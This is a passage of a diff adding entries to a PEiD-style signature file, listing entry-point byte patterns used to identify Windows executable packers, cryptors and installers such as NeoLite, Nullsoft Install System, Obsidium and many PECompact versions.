+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? 00 00 00 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 51 66 ?? ?? ?? 59 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E2 ?? ?? ?? ?? ?? 82 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Morphine v1.2 (DLL)]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 5B ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00
+ep_only = true
+
+[Neolite v2.0]
+signature = E9 A6 00 00 00
+ep_only = true
+
+[NeoLite vx.x]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9E 37 00 00 ?? ?? 48 ?? ?? ?? 6F 4C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 61
+ep_only = true
+
+[NeoLite v1.0]
+signature = E9 9B 00 00 00 A0
+ep_only = true
+
+[NeoLite v1.0]
+signature = 8B 44 24 04 8D 54 24 FC 23 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 FF 25
+ep_only = true
+
+[NeoLite v2.00]
+signature = E9 A6
+ep_only = true
+
+[NeoLite v2.00]
+signature = 8B 44 24 04 23 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 FE 05 ?? ?? ?? ?? 0B C0 74
+ep_only = true
+
+[NeoLite v2.0]
+signature = E9 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4E 65 6F 4C 69 74 65
+ep_only = true
+
+[NFO v1.0]
+signature = 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C
+ep_only = true
+
+[NFO v1.x modified]
+signature = 60 9C 8D 50
+ep_only = true
+
+[NoodleCrypt v2.0]
+signature = EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01
+ep_only = true
+
+[Nullsoft Install System v1.xx]
+signature = 55 8B EC 83 EC 2C 53 56 33 F6 57 56 89 75 DC 89 75 F4 BB A4 9E 40 00 FF 15 60 70 40 00 BF C0 B2 40 00 68 04 01 00 00 57 50 A3 AC B2 40 00 FF 15 4C 70 40 00 56 56 6A 03 56 6A 01 68 00 00 00 80 57 FF 15 9C 70 40 00 8B F8 83 FF FF 89 7D EC 0F 84 C3 00 00 00 56 56 56 89 75 E4 E8 C1 C9 FF FF 8B 1D 68 70 40 00 83 C4 0C 89 45 E8 89 75 F0 6A 02 56 6A FC 57 FF D3 89 45 FC 8D 45 F8 56 50 8D 45 E4 6A 04 50 57 FF 15 48 70 40 00 85 C0 75 07 BB 7C 9E 40 00 EB 7A 56 56 56 57 FF D3 39 75 FC 7E 62 BF 74 A2 40 00 B8 00 10 00 00 39 45 FC 7F 03 8B 45 FC 8D 4D F8 56 51 50 57 FF 75 EC FF 15 48 70 40 00 85 C0 74 5A FF 75 F8 57 FF 75 E8 E8 4D C9 FF FF 89 45 E8 8B 45 F8 29 45 FC 83 C4 0C 39 75 F4 75 11 57 E8 D3 F9 FF FF 85 C0 59 74 06 8B 45 F0 89 45 F4 8B 45 F8 01 45 F0 39 75 FC
+ep_only = true
+
+[Nullsoft Install System v1.xx]
+signature = 83 EC 0C 53 56 57 FF 15 20 71 40 00 05 E8 03 00 00 BE 60 FD 41 00 89 44 24 10 B3 20 FF 15 28 70 40 00 68 00 04 00 00 FF 15 28 71 40 00 50 56 FF 15 08 71 40 00 80 3D 60 FD 41 00 22 75 08 80 C3 02 BE 61 FD 41 00 8A 06 8B 3D F0 71 40 00 84 C0 74 0F 3A C3 74 0B 56 FF D7 8B F0 8A 06 84 C0 75 F1 80 3E 00 74 05 56 FF D7 8B F0 89 74 24 14 80 3E 20 75 07 56 FF D7 8B F0 EB F4 80 3E 2F 75
+ep_only = true
+
+[Nullsoft Install System v1.98]
+signature = 83 EC 0C 53 56 57 FF 15 2C 81 40
+ep_only = true
+
+[Nullsoft Install System v2.0b2, v2.0b3]
+signature = 83 EC 0C 53 55 56 57 FF 15 ?? 70 40 00 8B 35 ?? 92 40 00 05 E8 03 00 00 89 44 24 14 B3 20 FF 15 2C 70 40 00 BF 00 04 00 00 68 ?? ?? ?? 00 57 FF 15 ?? ?? 40 00 57 FF 15
+ep_only = true
+
+[Nullsoft PIMP Install System v1.3x]
+signature = 55 8B EC 81 EC ?? ?? 00 00 56 57 6A ?? BE ?? ?? ?? ?? 59 8D BD
+ep_only = true
+
+[Nullsoft PIMP Install System v1.x]
+signature = 83 EC 5C 53 55 56 57 FF 15 ?? ?? ?? 00
+ep_only = true
+
+[NX PE Packer v1.0]
+signature = FF 60 FF CA FF 00 BA DC 0D E0 40 00 50 00 60 00 70 00 80 00
+ep_only = true
+
+[Obsidium v1.1.1.1]
+signature = EB 02 ?? ?? E8 E7 1C 00 00
+ep_only = true
+
+[Obsidium v1.0.0.59 Final]
+signature = E8 AB 1C
+ep_only = true
+
+[Obsidium v1.0.0.61]
+signature = E8 AF 1C 00 00
+ep_only = true
+
+[Obsidium vx.x.x.x]
+signature = E8 47 19
+ep_only = true
+
+[ORiEN v2.11 (DEMO)]
+signature = E9 5D 01 00 00 CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F 74 65 63 74 69 6F 6E 20 73 79 73 74 65 6D 20 2D 0D 0A 2D 2D 2D 2D 2D 2D 20 43 72 65 61 74 65 64 20 62 79 20 41 2E 20 46 69 73 75 6E 2C 20 31 39 39 34 2D 32 30 30 33 20 2D 2D 2D 2D 2D 2D 0D 0A 2D 2D 2D 2D 2D 2D 2D 20 57 57 57 3A 20 68 74 74 70 3A 2F 2F 7A 61 6C 65 78 66 2E 6E 61 72 6F 64 2E 72 75 2F 20 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 20 65 2D 6D 61 69 6C 3A 20 7A 61 6C 65 78 66 40 68 6F 74 6D 61 69 6C 2E 72 75 20 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D
+ep_only = true
+
+[Pack Master v1.0]
+signature = 60 E8 01 ?? ?? ?? E8 83 C4 04 E8 01 ?? ?? ?? E9 5D 81 ED D3 22 40 ?? E8 04 02 ?? ?? E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46
+ep_only = true
+
+[PC PE Encryptor Alpha preview]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 ?? 2B 8D EE 32 40 00 83 E9 0B 89 8D F2 32 40 ?? 80 BD D1 32 40 ?? 01 0F 84
+ep_only = true
+
+[PEEncrypt v4.0b (JunkCode)]
+signature = 66 ?? ?? 00 66 83 ?? 00
+ep_only = true
+
+[PE Crypt v1.00/v1.01]
+signature = E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB
+ep_only = true
+
+[PE Crypt v1.02]
+signature = E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44
+ep_only = true
+
+[PE Crypt32 v1.02]
+signature = E8 00 00 00 00 5B 83 ?? ?? EB ?? 52 4E 44 21
+ep_only = true
+
+[PE Crypt32 (Console v1.0, v1.01, v1.02)]
+signature = E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB
+ep_only = true
+
+[PE Intro v1.0]
+signature = 8B 04 24 9C 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 45 40 ?? 80 BD 67 44 40 ?? ?? 0F 85 48
+ep_only = true
+
+[PE Lock NT v2.01]
+signature = EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD
+ep_only = true
+
+[PE Lock NT v2.02c]
+signature = EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD
+ep_only = true
+
+[PE Lock NT v2.03]
+signature = EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01
+ep_only = true
+
+[PE Lock NT v2.04]
+signature = EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3
+ep_only = true
+
+[PE Lock v1.06]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45
+ep_only = true
+
+[PE Pack v0.99]
+signature = 60 E8 ?? ?? ?? ?? 5D 83 ED 06 80 BD E0 04 ?? ?? 01 0F 84 F2
+ep_only = true
+
+[PE Pack v1.0]
+signature = 74 ?? E9
+ep_only = true
+
+[PE Packer]
+signature = FC 8B 35 70 01 40 ?? 83 EE 40 6A 40 68 ?? 30 10
+ep_only = true
+
+[PE Password v0.2 SMT/SMF]
+signature = E8 04 ?? ?? ?? 8B EC 5D C3 33 C0 5D 8B FD 81 ED 33 26 40 ?? 81 EF ?? ?? ?? ?? 83 EF 05 89 AD 88 27 40 ?? 8D 9D 07 29 40 ?? 8D B5 62 28 40 ?? 46 80
+ep_only = true
+
+[PE Protect v0.9]
+signature = 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 ?? ?? ?? ?? 58 83 C0 07 C6 ?? C3
+ep_only = true
+
+[PC Shrinker v0.20]
+signature = E8 E8 01 ?? ?? 60 01 AD B3 27 40 ?? 68
+ep_only = true
+
+[PC Shrinker v0.29]
+signature =  ?? BD ?? ?? ?? ?? 01 AD 55 39 40 ?? 8D B5 35 39 40
+ep_only = true
+
+[PC Shrinker v0.45]
+signature =  ?? BD ?? ?? ?? ?? 01 AD E3 38 40 ?? FF B5 DF 38 40
+ep_only = true
+
+[PC Shrinker v0.71]
+signature = 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85
+ep_only = true
+
+[PC-Guard v3.03d, v3.05d]
+signature = 55 50 E8 ?? ?? ?? ?? 5D EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01
+ep_only = true
+
+[PC-Guard v4.05d, v4.10d, v4.15d]
+signature = FC 55 50 E8 00 00 00 00 5D EB 01
+ep_only = true
+
+[PC-Guard v5.00d]
+signature = FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 30 D2 40 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 89 85 E1 EA 41 00 9C EB 01 D5 9D EB 01 0B 58 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 89 85 F9 EA 41 00 9C EB 01 D5 9D EB 01 0B 89 9D E5 EA 41 00 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 89 8D E9 EA 41 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 89 95 ED EA 41 00 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 89 B5 F1 EA 41 00 9C EB 01 D5 9D EB 01 0B 89
+ep_only = true
+
+[PE-Crypter]
+signature = 60 E8 00 00 00 00 5D EB 26
+ep_only = true
+
+[Pack Master v1.0]
+signature = 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46
+ep_only = true
+
+[PEBundle v0.2 - v2.0x]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95
+ep_only = true
+
+[PEBundle v2.0b5 - v2.3]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 01 AD ?? ?? ?? ?? 01 AD
+ep_only = true
+
+[PEBundle v2.44]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 83 BD
+ep_only = true
+
+[PECompact v0.90]
+signature = EB 06 68 ?? ?? 40 00 C3 9C 60 BD ?? ?? 00 00 B9 02 00 00 00 B0 90 8D BD 7A 42 40 00 F3 AA 01 AD D9 43 40 00 FF B5
+ep_only = true
+
+[PECompact v0.92]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 BD ?? ?? ?? ?? B9 02 ?? ?? ?? B0 90 8D BD A5 4F 40 ?? F3 AA 01 AD 04 51 40 ?? FF B5
+ep_only = true
+
+[PECompact v0.94]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 ?? ?? ?? ?? 5D 55 58 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 01 85 ?? ?? ?? ?? 50 B9 02
+ep_only = true
+
+[PECompact v0.971 - v0.976]
+signature = EB 06 68 C3 9C 60 E8 5D 55 5B 81 ED 8B 85 01 85 66 C7 85
+ep_only = true
+
+[PECompact v0.977]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB A0 86 40 ?? 87 DD 8B 85 2A 87
+ep_only = true
+
+[PECompact v0.978]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 24 88 40 ?? 87 DD 8B 85 A9 88
+ep_only = true
+
+[PECompact v0.978.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 49 87 40 ?? 87 DD 8B 85 CE 87
+ep_only = true
+
+[PECompact v0.978.2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D1 84 40 ?? 87 DD 8B 85 56 85
+ep_only = true
+
+[PECompact v0.98]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D7 84 40 ?? 87 DD 8B 85 5C 85
+ep_only = true
+
+[PECompact v0.99]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 2F 85 40 ?? 87 DD 8B 85 B4 85
+ep_only = true
+
+[PECompact v1.00]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB C4 84 40 ?? 87 DD 8B 85 49 85
+ep_only = true
+
+[PECompact v1.10b1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 28 63 40 ?? 87 DD 8B 85 AD 63
+ep_only = true
+
+[PECompact v1.10b2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 94 60
+ep_only = true
+
+[PECompact v1.10b3]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 95
+ep_only = true
+
+[PECompact v1.10b4]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 44
+ep_only = true
+
+[PECompact v1.10b5]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 49
+ep_only = true
+
+[PECompact v1.10b6]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 ?? 00 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB B7
+ep_only = true
+
+[PECompact v1.10b7]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB 14
+ep_only = true
+
+[PECompact v1.20 - v1.20.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 9A 70 40
+ep_only = true
+
+[PECompact v1.22]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 ?? 70 40 ?? 90 90 01 85 9E 70 40 ?? BB F3 08
+ep_only = true
+
+[PECompact v1.23b3 - v1.24.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 08
+ep_only = true
+
+[PECompact v1.24.2 - v1.24.3]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 09
+ep_only = true
+
+[PECompact v1.25]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? F3 0D
+ep_only = true
+
+[PECompact v1.26b1 - v1.26b2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? 05 0E
+ep_only = true
+
+[PECompact v1.33]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 00 80 40 ?? 90 90 01 85 9E 80 40 ?? BB E8 0E
+ep_only = true
+
+[PECompact v1.34 - v1.40b1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 00 80 ?? 40 90 90 01 85 9E 80 ?? 40 BB F8 10
+ep_only = true
+
+[PECompact v1.40b2 - v1.40b4]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 86 11
+ep_only = true
+
+[PECompact v1.40b5 - v1.40b6]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 8A 11
+ep_only = true
+
+[PECompact v1.40 - v1.45]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB C3 11
+ep_only = true
+
+[PECompact v1.46]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 60 12
+ep_only = true
+
+[PECompact v1.47 - v1.50]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 5B 12
+ep_only = true
+
+[PECompact v1.55]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A2 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 9E 80 40 ?? BB 2D 12
+ep_only = true
+
+[PECompact v1.56]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 90 40 ?? 87 DD 8B 85 A2 90 40 ?? 01 85 03 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 9E 90 40 ?? BB 2D 12
+ep_only = true
+
+[PECompact v1.60 - v1.65]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 80 40 ?? 87 DD 8B 85 D2 80 40 ?? 01 85 33 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 CE 80 40 ?? BB BB 12
+ep_only = true
+
+[PECompact v1.66]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 ?? 87 DD 8B 85 E6 90 40 ?? 01 85 33 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 DA 90 40 ?? 01 85 DE 90 40 ?? 01 85 E2 90 40 ?? BB 5B 11
+ep_only = true
+
+[PECompact v1.67]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 8B 11
+ep_only = true
+
+[PECompact v1.68 - v1.84]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 7B 11
+ep_only = true
+
+[PECompact v1.4x+]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81
+ep_only = true
+
+[PECompact v1.84]
+signature = 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81
+ep_only = true
+
+[PECompact v2.0 beta -> Jeremy Collake]
+signature = B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90
+ep_only = true
+
+[PE Diminisher v0.1]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74
+ep_only = true
+
+[PE Diminisher v0.1]
+signature = 5D 8B D5 81 ED A2 30 40 ?? 2B 95 91 33 40 ?? 81 EA 0B ?? ?? ?? 89 95 9A 33 40 ?? 80 BD 99
+ep_only = true
+
+[PEncrypt v1.0]
+signature = 60 9C BE 00 10 40 00 8B FE B9 28 03 00 00 BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61
+ep_only = true
+
+[PEncrypt v3.0]
+signature = E8 00 00 00 00 5D 81 ED 05 10 40 00 8D B5 24 10 40 00 8B FE B9 0F 00 00 00 BB ?? ?? ?? ?? AD 33 C3 E2 FA
+ep_only = true
+
+[PEncrypt v3.1]
+signature = E9 ?? ?? ?? 00 F0 0F C6
+ep_only = true
+
+[PEnguinCrypt v1.0]
